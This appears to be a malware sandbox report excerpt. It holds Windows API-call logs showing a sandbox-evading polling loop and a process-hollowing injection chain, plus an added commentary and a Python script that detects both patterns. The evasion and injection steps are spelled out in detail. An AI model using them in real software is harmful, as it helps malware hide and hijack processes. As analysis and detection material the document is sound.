System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 252784 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 3
Fn
System Get Time type = Ticks, time = 252924 True 6
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 252940 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 252971 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 252986 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253002 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253033 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253064 True 1
Fn
System Get Time type = Ticks, time = 253080 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253096 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253111 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253142 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253158 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253189 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253205 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 253220 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253236 True 1
System Get Time type = Ticks, time = 253252 True 4
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253267 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253283 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253314 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253314 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253314 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253330 True 1
System Get Time type = Ticks, time = 253345 True 4
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253345 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253345 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253361 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253361 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253376 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253376 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253376 True 5
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253392 True 10
System Get Time type = Ticks, time = 253408 True 5
System Get Time type = Ticks, time = 253423 True 5
System Get Time type = Ticks, time = 253439 True 5
System Get Time type = Ticks, time = 253454 True 10
System Get Time type = Ticks, time = 253470 True 10
System Get Time type = Ticks, time = 253486 True 10
System Get Time type = Ticks, time = 253517 True 10
System Get Time type = Ticks, time = 253532 True 10
System Get Time type = Ticks, time = 253548 True 15
System Get Time type = Ticks, time = 253564 True 10
System Get Time type = Ticks, time = 253579 True 5
System Get Time type = Ticks, time = 253595 True 5
System Get Time type = Ticks, time = 253610 True 5
System Get Time type = Ticks, time = 253642 True 10
System Get Time type = Ticks, time = 253657 True 5
System Get Time type = Ticks, time = 253704 True 5
System Get Time type = Ticks, time = 253735 True 10
System Get Time type = Ticks, time = 253751 True 10
System Get Time type = Ticks, time = 253766 True 25
System Get Time type = Ticks, time = 253782 True 40
System Get Time type = Ticks, time = 253798 True 16
System Get Time type = Ticks, time = 253813 True 4
System Get Time type = Ticks, time = 253829 True 10
System Get Time type = Ticks, time = 253844 True 10
System Get Time type = Ticks, time = 253860 True 5
System Get Time type = Ticks, time = 253907 True 5
System Get Time type = Ticks, time = 253922 True 1
System Get Time type = Ticks, time = 253969 True 5
System Get Time type = Ticks, time = 253985 True 14
System Get Time type = Ticks, time = 254000 True 10
System Get Time type = Ticks, time = 254016 True 5
System Get Time type = Ticks, time = 254032 True 5
System Get Time type = Ticks, time = 254047 True 10
System Get Time type = Ticks, time = 254063 True 5
System Get Time type = Ticks, time = 254078 True 5
System Get Time type = Ticks, time = 254094 True 5
System Get Time type = Ticks, time = 254110 True 5
System Get Time type = Ticks, time = 254125 True 10
System Get Time type = Ticks, time = 254141 True 15
System Get Time type = Ticks, time = 254156 True 5
System Get Time type = Ticks, time = 254172 True 5
System Get Time type = Ticks, time = 254188 True 10
System Get Time type = Ticks, time = 254203 True 10
System Get Time type = Ticks, time = 254219 True 5
System Get Time type = Ticks, time = 254234 True 5
System Get Time type = Ticks, time = 254250 True 5
System Get Time type = Ticks, time = 254266 True 5
System Get Time type = Ticks, time = 254281 True 5
System Get Time type = Ticks, time = 254297 True 5
System Get Time type = Ticks, time = 254328 True 15
System Get Time type = Ticks, time = 254344 True 5
System Get Time type = Ticks, time = 254359 True 5
System Get Time type = Ticks, time = 254375 True 5
System Get Time type = Ticks, time = 254390 True 5
System Get Time type = Ticks, time = 254406 True 5
System Get Time type = Ticks, time = 254422 True 5
System Get Time type = Ticks, time = 254437 True 5
System Get Time type = Ticks, time = 254453 True 10
System Get Time type = Ticks, time = 254468 True 5
System Get Time type = Ticks, time = 254484 True 20
System Get Time type = Ticks, time = 254515 True 6
System Get Time type = Ticks, time = 254531 True 49
System Get Time type = Ticks, time = 254546 True 45
System Get Time type = Ticks, time = 254562 True 35
System Get Time type = Ticks, time = 254578 True 5
System Get Time type = Ticks, time = 254593 True 40
System Get Time type = Ticks, time = 254609 True 20
System Get Time type = Ticks, time = 254624 True 5
System Get Time type = Ticks, time = 254640 True 45
System Get Time type = Ticks, time = 254656 True 45
System Get Time type = Ticks, time = 254671 True 30
System Get Time type = Ticks, time = 254687 True 35
System Get Time type = Ticks, time = 254702 True 17
System Get Time type = Local Time, time = 2018-06-26 00:54:28 (Local Time) True 1
Module Load module_name = ntdll, base_address = 0x77be0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtAllocateVirtualMemory, address_out = 0x77bffab0 True 1
Module Load module_name = kernel32, base_address = 0x75fb0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75fc5223 True 1
Module Load module_name = kernel32, base_address = 0x75fb0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x75fc103d True 1
Process Create process_name = C:\ProgramData\oyvGkGw.exe, os_pid = 0x62c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Module Load module_name = ntdll, base_address = 0x77be0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtUnmapViewOfSection, address_out = 0x77bffc70 True 1
Module Unmap process_name = C:\ProgramData\oyvGkGw.exe True 1
Memory Allocate process_name = C:\ProgramData\oyvGkGw.exe, address = 0x150004, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 277989832 True 1
Module Load module_name = ntdll, base_address = 0x77be0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtWriteVirtualMemory, address_out = 0x77bffe04 True 1
Memory Write process_name = C:\ProgramData\oyvGkGw.exe, address = 0x400000, size = 512 True 1
Memory Write process_name = C:\ProgramData\oyvGkGw.exe, address = 0x43c000, size = 512 True 1
Memory Write process_name = C:\ProgramData\oyvGkGw.exe, address = 0x401000, size = 239104 True 1
Module Load module_name = ntdll, base_address = 0x77be0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtGetContextThread, address_out = 0x77c00c20 True 1
Thread Get Context process_name = c:\programdata\oyvgkgw.exe, os_tid = 0x89c True 1
Memory Write process_name = C:\ProgramData\oyvGkGw.exe, address = 0x7efde008, size = 4 True 1
Module Load module_name = ntdll, base_address = 0x77be0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtSetContextThread, address_out = 0x77c01910 True 1
Thread Set Context process_name = c:\programdata\oyvgkgw.exe, os_tid = 0x89c True 1
Module Load module_name = ntdll, base_address = 0x77be0000 True 1
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtResumeThread, address_out = 0x77c00058 True 1
Thread Resume process_name = c:\programdata\oyvgkgw.exe, os_tid = 0x89c True 1
Module Load module_name = kernel32, base_address = 0x75fb0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x75fd174d True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
System Get Time type = Ticks, time = 268259 True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
System Get Time type = Ticks, time = 268306 True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0, value_name = AllowUnsafeObjectPassing, data = 68, type = REG_NONE False 1
File Get Info filename = C:\Windows\system32\.HLP, type = file_attributes False 2
System Get Info type = Windows Directory, result_out = C:\Windows True 1
File Get Info filename = C:\Windows\Help\.HLP, type = file_attributes False 2
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
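The rows above record two behaviours worth checking mechanically rather than by eye. First, from 00:54:25 to 00:54:28 the thread does nothing but Sleep(0) and read the local time and tick count: a busy-wait delay which, unlike a single long Sleep, a sandbox cannot shorten by fast-forwarding the clock. Second, immediately afterwards, a textbook process-hollowing chain against C:\ProgramData\oyvGkGw.exe: CreateProcessW with CREATE_SUSPENDED and SW_HIDE, NtUnmapViewOfSection, NtAllocateVirtualMemory with PAGE_EXECUTE_READWRITE, NtWriteVirtualMemory of the headers (512 bytes at 0x400000) and sections (239104 bytes at 0x401000), NtGetContextThread, a 4-byte write at 0x7efde008 (consistent with patching PEB.ImageBaseAddress, since the 32-bit PEB sits at 0x7efde000 on this guest and ImageBaseAddress is at offset 8; the log itself does not name the field), NtSetContextThread and NtResumeThread. The Injection Information table for Process #10 further down shows the same chain from the target's side. The script below is an added example and not part of the VMRay report: it parses rows in the layout used on this page (Category Operation key = value, ... Success Count), flags the hollowing chain per target process and measures the polling loop. The sample rows are copied (condensed) from this thread log; the thresholds, field names and the PEB-offset interpretation are my own.

```python
import re
from datetime import datetime

# Rows copied from the thread log above (condensed; non-row lines such as the Fn/Data link labels are skipped).
SAMPLE_LOG = r"""
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1
System Get Time type = Ticks, time = 253236 True 1
System Get Time type = Ticks, time = 253782 True 40
System Get Time type = Ticks, time = 254531 True 49
System Get Time type = Ticks, time = 254702 True 17
System Get Time type = Local Time, time = 2018-06-26 00:54:28 (Local Time) True 1
Process Create process_name = C:\ProgramData\oyvGkGw.exe, os_pid = 0x62c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Module Unmap process_name = C:\ProgramData\oyvGkGw.exe True 1
Memory Allocate process_name = C:\ProgramData\oyvGkGw.exe, address = 0x150004, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 277989832 True 1
Memory Write process_name = C:\ProgramData\oyvGkGw.exe, address = 0x400000, size = 512 True 1
Memory Write process_name = C:\ProgramData\oyvGkGw.exe, address = 0x401000, size = 239104 True 1
Memory Write process_name = C:\ProgramData\oyvGkGw.exe, address = 0x7efde008, size = 4 True 1
Thread Set Context process_name = c:\programdata\oyvgkgw.exe, os_tid = 0x89c True 1
Thread Resume process_name = c:\programdata\oyvgkgw.exe, os_tid = 0x89c True 1
"""

# Row layout on this page: "Category Operation key = value, ... Success Count".
ROW_RE = re.compile(r"^(?P<category>[A-Z]\w*) (?P<operation>[A-Z][a-z]+(?: [A-Z][a-z]+)*?) "
                    r"(?P<info>[a-z_]+ = .*|-) (?P<success>True|False) (?P<count>\d+)$")
STAGES = {("Process", "Create"): "create_suspended", ("Module", "Unmap"): "unmap",
          ("Memory", "Allocate"): "rwx_alloc", ("Memory", "Write"): "write",
          ("Thread", "Set Context"): "set_context", ("Thread", "Resume"): "resume"}
REQUIRED = {"create_suspended": ("creation_flags", "CREATE_SUSPENDED"),  # (parameter, substring it must hold)
            "rwx_alloc": ("protection", "PAGE_EXECUTE_READWRITE")}


def parse_log(text):
    """Parse rows into dicts; lines that are not rows (the Fn/Data link labels, headers) are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        row, params = m.groupdict(), {}
        if row["info"] != "-":
            # Values can contain ", " (MEM_COMMIT, MEM_RESERVE): split only before the next "key = ".
            for field in re.split(r", (?=\w+ = )", row["info"]):
                key, _, value = field.partition(" = ")
                params[key] = value
        row.update(params=params, success=row["success"] == "True", count=int(row["count"]))
        rows.append(row)
    return rows


def detect_hollowing(rows):
    """One hit per target created suspended, written to, re-contexted and resumed, in that order."""
    targets = {}
    for i, r in enumerate(rows):
        name, p = r["params"].get("process_name"), r["params"]
        stage = STAGES.get((r["category"], r["operation"])) if name else None
        if not stage or (stage in REQUIRED and REQUIRED[stage][1] not in p.get(REQUIRED[stage][0], "")):
            continue
        t = targets.setdefault(name.lower(), {"first": {}, "writes": []})
        t["first"].setdefault(stage, i)  # row index of the first occurrence of each stage
        if stage == "write":
            t["writes"].append((int(p["address"], 16), int(p["size"])))
    hits = []
    for name, t in targets.items():
        order = [t["first"].get(s) for s in ("create_suspended", "write", "set_context", "resume")]
        if None in order or order != sorted(order):
            continue
        image = [(a, s) for a, s in t["writes"] if s > 4]
        hits.append({"target": name,
                     "image_base": min(a for a, _ in image) if image else None,
                     "bytes_written": sum(s for _, s in image),
                     "unmapped": "unmap" in t["first"],
                     "rwx_alloc": "rwx_alloc" in t["first"],
                     # 0x7efde008 = PEB (0x7efde000 on this guest) + 8 = PEB.ImageBaseAddress (offset assumed from the x86 PEB layout)
                     "pointer_sized_writes": [a for a, s in t["writes"] if s == 4]})
    return hits


def detect_busy_wait(rows, min_polls=20):
    """Longest run of Sleep(0)/Get Time rows, weighted by the Count column; None if below min_polls."""
    best, run = None, []

    def close_run():
        nonlocal best
        polls = sum(r["count"] for r in run)
        ticks = [int(r["params"]["time"]) for r in run if r["params"].get("type") == "Ticks"]
        walls = [datetime.strptime(r["params"]["time"].split(" (")[0], "%Y-%m-%d %H:%M:%S")
                 for r in run if r["params"].get("type") == "Local Time"]
        if polls >= min_polls and len(ticks) > 1 and (best is None or polls > best["polls"]):
            best = {"polls": polls, "tick_elapsed_ms": ticks[-1] - ticks[0],
                    "wall_seconds": int((walls[-1] - walls[0]).total_seconds()) if len(walls) > 1 else None}
        run.clear()

    for r in rows:  # a Sleep with a non-zero duration, or any other call, ends the run
        if r["category"] == "System" and (r["operation"] == "Get Time" or (
                r["operation"] == "Sleep" and r["params"].get("duration", "").startswith("0 "))):
            run.append(r)
        else:
            close_run()
    close_run()
    return best
```

`detect_hollowing(parse_log(SAMPLE_LOG))` returns one hit for c:\programdata\oyvgkgw.exe with image base 0x400000, 239616 bytes of image written, and both the unmap and the RWX allocation present; `detect_busy_wait` on the same rows reports 110 polls spanning 1466 ticks and 3 wall-clock seconds. Paste the full thread log in place of SAMPLE_LOG to get the real counts: the Count column is honoured, so an aggregated row such as "True 49" counts as 49 calls, which is why the tick delta and the wall-clock span disagree on a condensed sample.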
Process #10: syncpack.exe
47 0
Information Value
ID #10
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
»
Information Value
PID 0x8a0
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x608, 0xA8, 0x79C, 0x280, 0x740, 0x978, 0x9B0
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
pagefile_0x0000000000210000 0x00210000 0x00212fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x00220000 0x00220fff Memory Mapped File Readable False False False -
pagefile_0x0000000000220000 0x00220000 0x00222fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable True False False -
private_0x0000000000240000 0x00240000 0x00243fff Private Memory Readable, Writable True False False -
private_0x0000000000250000 0x00250000 0x00267fff Private Memory Readable, Writable True False False -
private_0x0000000000270000 0x00270000 0x002effff Private Memory Readable, Writable True False False -
pagefile_0x00000000002f0000 0x002f0000 0x003cefff Pagefile Backed Memory Readable True False False -
private_0x00000000003d0000 0x003d0000 0x003dffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True False False -
wi 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000420000 0x00420000 0x0042ffff Private Memory - True False False -
private_0x0000000000430000 0x00430000 0x0043ffff Private Memory Readable, Writable True False False -
private_0x0000000000440000 0x00440000 0x0044ffff Private Memory Readable, Writable True False False -
private_0x0000000000450000 0x00450000 0x0045ffff Private Memory Readable, Writable True False False -
private_0x0000000000460000 0x00460000 0x0046ffff Private Memory Readable, Writable True False False -
private_0x0000000000470000 0x00470000 0x0047ffff Private Memory - True False False -
private_0x0000000000480000 0x00480000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x004affff Private Memory Readable, Writable True False False -
private_0x00000000004b0000 0x004b0000 0x004bffff Private Memory Readable, Writable True False False -
private_0x00000000004c0000 0x004c0000 0x004cffff Private Memory Readable, Writable True False False -
private_0x00000000004d0000 0x004d0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004e0000 0x004e0000 0x004effff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x005effff Private Memory Readable, Writable True False False -
pagefile_0x00000000005f0000 0x005f0000 0x00777fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000780000 0x00780000 0x00900fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000910000 0x00910000 0x01d0ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d10000 0x01d10000 0x01e9ffff Private Memory Readable, Writable True False False -
private_0x0000000001d10000 0x01d10000 0x01d1ffff Private Memory Readable, Writable True False False -
private_0x0000000001d20000 0x01d20000 0x01d9ffff Private Memory Readable, Writable True False False -
private_0x0000000001da0000 0x01da0000 0x01ddffff Private Memory Readable, Writable True False False -
private_0x0000000001de0000 0x01de0000 0x01deffff Private Memory Readable, Writable True False False -
private_0x0000000001df0000 0x01df0000 0x01e2ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000001e30000 0x01e30000 0x01e30fff Pagefile Backed Memory Readable True False False -
private_0x0000000001e40000 0x01e40000 0x01e40fff Private Memory Readable, Writable True False False -
pagefile_0x0000000001e50000 0x01e50000 0x01e50fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000001e60000 0x01e60000 0x01e62fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e70000 0x01e70000 0x01e70fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e80000 0x01e80000 0x01e80fff Pagefile Backed Memory Readable True False False -
private_0x0000000001e90000 0x01e90000 0x01e9ffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01fdffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01f9ffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01f5ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000001ea0000 0x01ea0000 0x01ea2fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001eb0000 0x01eb0000 0x01ebffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000001f20000 0x01f20000 0x01f5ffff Private Memory Readable, Writable True False False -
private_0x0000000001f60000 0x01f60000 0x01f9ffff Private Memory Readable, Writable True False False -
private_0x0000000001fa0000 0x01fa0000 0x01fdffff Private Memory Readable, Writable True False False -
private_0x0000000002020000 0x02020000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000002060000 0x02060000 0x0224ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002060000 0x02060000 0x0215ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000021b0000 0x021b0000 0x0224ffff Private Memory Readable, Writable True False False -
private_0x0000000002250000 0x02250000 0x0244ffff Private Memory Readable, Writable True False False -
private_0x0000000002250000 0x02250000 0x0234ffff Private Memory Readable, Writable True False False -
private_0x0000000002350000 0x02350000 0x0238ffff Private Memory Readable, Writable True False False -
private_0x0000000002390000 0x02390000 0x023cffff Private Memory Readable, Writable True False False -
private_0x00000000023d0000 0x023d0000 0x0240ffff Private Memory Readable, Writable True False False -
private_0x0000000002410000 0x02410000 0x0244ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02450000 0x0271efff Memory Mapped File Readable False False False -
office.odf 0x02720000 0x02959fff Memory Mapped File Readable False False False -
pagefile_0x0000000002960000 0x02960000 0x02d5ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002d60000 0x02d60000 0x02e60fff Private Memory Readable, Writable True False False -
private_0x0000000002d60000 0x02d60000 0x02d9ffff Private Memory Readable, Writable True False False -
private_0x0000000002e50000 0x02e50000 0x02e8ffff Private Memory Readable, Writable True False False -
private_0x0000000002e90000 0x02e90000 0x02f8ffff Private Memory Readable, Writable True False False -
private_0x0000000004290000 0x04290000 0x0438ffff Private Memory Readable, Writable True False False -
private_0x0000000004390000 0x04390000 0x0448ffff Private Memory Readable, Writable True False False -
private_0x0000000004490000 0x04490000 0x0458ffff Private Memory Readable, Writable True False False -
private_0x0000000004590000 0x04590000 0x0468ffff Private Memory Readable, Writable True False False -
mspst32.dll 0x6fb80000 0x6fc8cfff Memory Mapped File Readable, Writable, Executable False False False -
contab32.dll 0x6fc90000 0x6fcb0fff Memory Mapped File Readable, Writable, Executable False False False -
sfc_os.dll 0x6fcc0000 0x6fcccfff Memory Mapped File Readable, Writable, Executable False False False -
sfc.dll 0x6fcf0000 0x6fcf2fff Memory Mapped File Readable, Writable, Executable False False False -
mapir.dll 0x6fd00000 0x6fe30fff Memory Mapped File Readable, Writable, Executable False False False -
olmapi32.dll 0x6feb0000 0x70181fff Memory Mapped File Readable, Writable, Executable False False False -
mso.dll 0x71490000 0x724a7fff Memory Mapped File Readable, Writable, Executable False False False -
riched20.dll 0x744d0000 0x745d8fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
msi.dll 0x74a70000 0x74caffff Memory Mapped File Readable, Writable, Executable False False False -
msvcr80.dll 0x74cb0000 0x74d4afff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
